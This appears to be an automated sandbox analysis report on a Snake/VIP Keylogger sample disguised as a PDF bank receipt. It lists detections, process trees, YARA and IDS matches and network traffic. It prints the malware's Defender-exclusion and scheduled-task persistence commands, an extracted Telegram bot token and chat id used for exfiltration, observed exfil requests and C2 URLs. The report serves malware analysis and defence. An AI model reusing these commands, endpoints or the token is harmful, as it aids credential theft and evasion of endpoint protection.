Windows Analysis Report
rDEKONT-1_16_2025__75kb__pdf.exe

Overview

General Information

Sample name: rDEKONT-1_16_2025__75kb__pdf.exe
Analysis ID: 1592453
MD5: 14246ea59962956247cb757ff4c485e8
SHA1: 41233827e40eacdc99a408d0b0ecfe78ee24120c
SHA256: f89d5db1d93b61d6e6346fa86e914a5b02e927c8eee905e658b0818f76a545ca
Tags: exe, user-Porcupine

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • rDEKONT-1_16_2025__75kb__pdf.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe" MD5: 14246EA59962956247CB757FF4C485E8)
    • powershell.exe (PID: 7500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7736 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7524 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • teXfNv.exe (PID: 7888 cmdline: C:\Users\user\AppData\Roaming\teXfNv.exe MD5: 14246EA59962956247CB757FF4C485E8)
    • schtasks.exe (PID: 7952 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpC16A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • teXfNv.exe (PID: 8008 cmdline: "C:\Users\user\AppData\Roaming\teXfNv.exe" MD5: 14246EA59962956247CB757FF4C485E8)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Bot Token": "7293224337:AAGQ5dfI8Gbcc9C0VWXufkTkIt2XTgIrMks", "Chat id": "7727510436", "Version": "4.4"}
{"Exfil Mode": "Telegram", "Token": "7293224337:AAGQ5dfI8Gbcc9C0VWXufkTkIt2XTgIrMks", "Chat_id": "7727510436", "Version": "4.4"}
Source: 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Author: Joe Security
Source: 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Author: Joe Security
Source: 0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Author: Joe Security
Source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security

Source: 8.2.teXfNv.exe.4245570.1.unpack, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 8.2.teXfNv.exe.4245570.1.unpack, Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Author: Joe Security
Source: 8.2.teXfNv.exe.4245570.1.unpack, Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Author: Joe Security
Source: 8.2.teXfNv.exe.4245570.1.unpack, Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Author: unknown, Strings:
  • 0x2ba96:$a1: get_encryptedPassword
  • 0x2bdaf:$a2: get_encryptedUsername
  • 0x2b8b4:$a3: get_timePasswordChanged
  • 0x2b9af:$a4: get_passwordField
  • 0x2baac:$a5: set_encryptedPassword
  • 0x2d1b5:$a7: get_logins
  • 0x2d118:$a10: KeyLoggerEventArgs
  • 0x2cd7d:$a11: KeyLoggerEventArgsEventHandler
Source: 8.2.teXfNv.exe.4245570.1.unpack, Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Author: Florian Roth, Strings:
  • 0x39849:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x38eec:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x39149:$a4: \Orbitum\User Data\Default\Login Data
  • 0x39b28:$a5: \Kometa\User Data\Default\Login Data

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe", ParentImage: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe, ParentProcessId: 7328, ParentProcessName: rDEKONT-1_16_2025__75kb__pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe", ProcessId: 7500, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpC16A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpC16A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\teXfNv.exe, ParentImage: C:\Users\user\AppData\Roaming\teXfNv.exe, ParentProcessId: 7888, ParentProcessName: teXfNv.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpC16A.tmp", ProcessId: 7952, ProcessName: schtasks.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe", ParentImage: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe, ParentProcessId: 7328, ParentProcessName: rDEKONT-1_16_2025__75kb__pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp", ProcessId: 7524, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe", ParentImage: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe, ParentProcessId: 7328, ParentProcessName: rDEKONT-1_16_2025__75kb__pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe", ProcessId: 7500, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe", ParentImage: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe, ParentProcessId: 7328, ParentProcessName: rDEKONT-1_16_2025__75kb__pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp", ProcessId: 7524, ProcessName: schtasks.exe
Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-01-16T07:02:04.974396+0100  2803305  3         Unknown Traffic          192.168.2.4  49735        104.21.64.1      443               TCP
2025-01-16T07:02:07.607453+0100  2803305  3         Unknown Traffic          192.168.2.4  49742        104.21.64.1      443               TCP
2025-01-16T07:02:08.850293+0100  2803305  3         Unknown Traffic          192.168.2.4  49745        104.21.64.1      443               TCP
2025-01-16T07:02:10.145275+0100  2803305  3         Unknown Traffic          192.168.2.4  49749        104.21.64.1      443               TCP
2025-01-16T07:02:10.191417+0100  2803305  3         Unknown Traffic          192.168.2.4  49750        104.21.64.1      443               TCP
2025-01-16T07:02:11.507464+0100  2803305  3         Unknown Traffic          192.168.2.4  49753        104.21.64.1      443               TCP
2025-01-16T07:02:14.088006+0100  2803305  3         Unknown Traffic          192.168.2.4  49761        104.21.64.1      443               TCP
2025-01-16T07:02:14.088595+0100  2803305  3         Unknown Traffic          192.168.2.4  49762        104.21.64.1      443               TCP
2025-01-16T07:02:15.411932+0100  2803305  3         Unknown Traffic          192.168.2.4  49765        104.21.64.1      443               TCP
2025-01-16T07:02:16.746654+0100  2803305  3         Unknown Traffic          192.168.2.4  49769        104.21.64.1      443               TCP
2025-01-16T07:02:03.292929+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49733        132.226.247.73   80                TCP
2025-01-16T07:02:04.292895+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49733        132.226.247.73   80                TCP
2025-01-16T07:02:05.699112+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49737        132.226.247.73   80                TCP
2025-01-16T07:02:06.983360+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49740        132.226.247.73   80                TCP
2025-01-16T07:02:08.292851+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49740        132.226.247.73   80                TCP
2025-01-16T07:02:09.538712+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49747        132.226.247.73   80                TCP
2025-01-16T07:02:15.004480+0100  1810007  1         Potentially Bad Traffic  192.168.2.4  49764        149.154.167.220  443               TCP
2025-01-16T07:02:19.007972+0100  1810007  1         Potentially Bad Traffic  192.168.2.4  49775        149.154.167.220  443               TCP

AV Detection

Source: rDEKONT-1_16_2025__75kb__pdf.exe, Avira: detected
Source: C:\Users\user\AppData\Roaming\teXfNv.exe, Avira: detection malicious, Label: HEUR/AGEN.1310400
Source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7293224337:AAGQ5dfI8Gbcc9C0VWXufkTkIt2XTgIrMks", "Chat_id": "7727510436", "Version": "4.4"}
Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.raw.unpack, Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7293224337:AAGQ5dfI8Gbcc9C0VWXufkTkIt2XTgIrMks", "Chat id": "7727510436", "Version": "4.4"}
Source: C:\Users\user\AppData\Roaming\teXfNv.exe, ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Roaming\teXfNv.exe, Virustotal: Detection: 27%
Source: rDEKONT-1_16_2025__75kb__pdf.exe, Virustotal: Detection: 27%
Source: rDEKONT-1_16_2025__75kb__pdf.exe, ReversingLabs: Detection: 26%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\teXfNv.exe, Joe Sandbox ML: detected
Source: rDEKONT-1_16_2025__75kb__pdf.exe, Joe Sandbox ML: detected

Location Tracking

Source: unknown, DNS query: name: reallyfreegeoip.org
Source: rDEKONT-1_16_2025__75kb__pdf.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49734 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49743 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: rDEKONT-1_16_2025__75kb__pdf.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mscorlib.pdb source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4162079442.0000000006324000.00000004.00000020.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4162004610.0000000006310000.00000004.00000020.00020000.00000000.sdmp

Networking

Source: Network traffic, Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49775 -> 149.154.167.220:443
Source: Network traffic, Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49764 -> 149.154.167.220:443
Source: unknown, DNS query: name: api.telegram.org
Source: Yara match, File source: 8.2.teXfNv.exe.4245570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.teXfNv.exe.4288990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.49b4148.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4994128.0.raw.unpack, type: UNPACKEDPE
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2016/01/2025%20/%2013:16:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2016/01/2025%20/%2012:17:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                  Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49747 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49750 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49735 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49769 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49762 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49761 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49753 -> 104.21.64.1:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49734 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49743 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 16 Jan 2025 06:02:14 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 16 Jan 2025 06:02:18 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1724559523.00000000035B4000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1764945738.0000000003249000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
